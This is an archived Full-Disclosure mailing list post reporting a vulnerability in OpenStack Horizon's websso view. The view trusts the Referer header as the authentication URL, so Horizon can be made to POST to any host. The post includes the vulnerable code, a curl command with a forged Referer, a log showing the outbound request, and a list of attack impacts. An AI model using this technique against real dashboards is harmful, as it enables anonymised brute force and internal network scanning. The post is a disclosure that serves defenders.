lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <2301189.jysZMhQnBn@bikelane>
Date: Thu, 20 Oct 2022 09:10:11 +0200
From: Sven Anders <fulldisclosure2022@...n.anders.hamburg>
To: fulldisclosure@...lists.org
Subject: [FD] OpenStack Horizon,
	it is posible to trigger a POST Request to any address

Hi,

we opened a bug at OpenStack, 3 month ago, but nobody takes care about it. Due 
to the OpenStack guidlines the bug report is now public readable.

https://bugs.launchpad.net/horizon/+bug/1980349

I am not a security expert and do not know how bad this bug is, there is now 
CVE and so on. Please be kind.

# Description of the bug

We use OpenStack horizon in the following version: `git+https://opendev.org/
openstack/horizon@...bb3626bc1dbcf29a55aeb094f4350067317cd#egg=horizon`

In Horizon there is the following code in Xena:
openstack_auth/views.py

```
def websso(request):
    """Logs a user in using a token from Keystone's POST."""
    referer = request.META.get('HTTP_REFERER', 
settings.OPENSTACK_KEYSTONE_URL)
    auth_url = utils.clean_up_auth_url(referer)
    token = request.POST.get('token')
    try:
        request.user = auth.authenticate(request, auth_url=auth_url,
                                         token=token)
   ...
```

This call is usually called during SAML-Auth, but you can call it on the 
command line like this:

``
curl -v 'http://horizon-name:8080/auth/websso/' -X POST -H 'Referer: https://
referer:5001/' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 
'token=mytoken'
``

The token is not checked.

So an attacker can control the content of the HTTP_REFERER and then an auth 
POST request will be sent to this address.

I have changed the referer to a web server https://webserver/su-huhu/ and you 
can find inside the logfile:

```
access.log: <ip-address-of-horizon> - - [28/Jun/2022:08:15:06 +0200] "POST /
su-huhu/v3/auth/tokens HTTP/1.1" 404 6529 "-" "openstack_auth 
keystoneauth1/4.5.0 python-requests/2.27.1 CPython/3.8.10"
```

# Impact

* An attacker can hide his ip and do a brute force attack to any other ip via 
all public available horizon dashboards.
* An attacker can setup a machine, set the referer to this machine and then 
send some ugly results (e.g. very long, never ending, wrong json code, ssl 
protocol issues) to the horizon service.
* An attacker can analyze which services are available on the horizon host (if 
it is behind a firewall, use DNS Servers with private zones). Note that you are 
able to change the port number to any number. I have not tested, but perhaps 
it is also possible to change the protocol to another value, let's say: 
imap://user:passwort@....

# Is this only relevant for xena

The code has changed on master branch, but the bug is still there:
```
# TODO(stephenfin): Migrate to CBV
@sensitive_post_parameters()
@csrf_exempt
@never_cache
def websso(request):
    """Logs a user in using a token from Keystone's POST."""
    if settings.WEBSSO_USE_HTTP_REFERER:
        referer = request.META.get('HTTP_REFERER',
                                   settings.OPENSTACK_KEYSTONE_URL)
        auth_url = utils.clean_up_auth_url(referer)
    else:
        auth_url = settings.OPENSTACK_KEYSTONE_URL
    token = request.POST.get('token')
    try:
        request.user = auth.authenticate(request, auth_url=auth_url,
                                         token=token)
    except exceptions.KeystoneAuthException as exc:
        if settings.WEBSSO_DEFAULT_REDIRECT:
            res = django_http.HttpResponseRedirect(settings.LOGIN_ERROR)
        else:
            msg = 'Login failed: %s' % exc
            res = django_http.HttpResponseRedirect(settings.LOGIN_URL)
            set_logout_reason(res, msg)
        return res
```

only changing the WEBSSO_USE_HTTP_REFERER to false (Default true) will forbid 
to call this.




_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ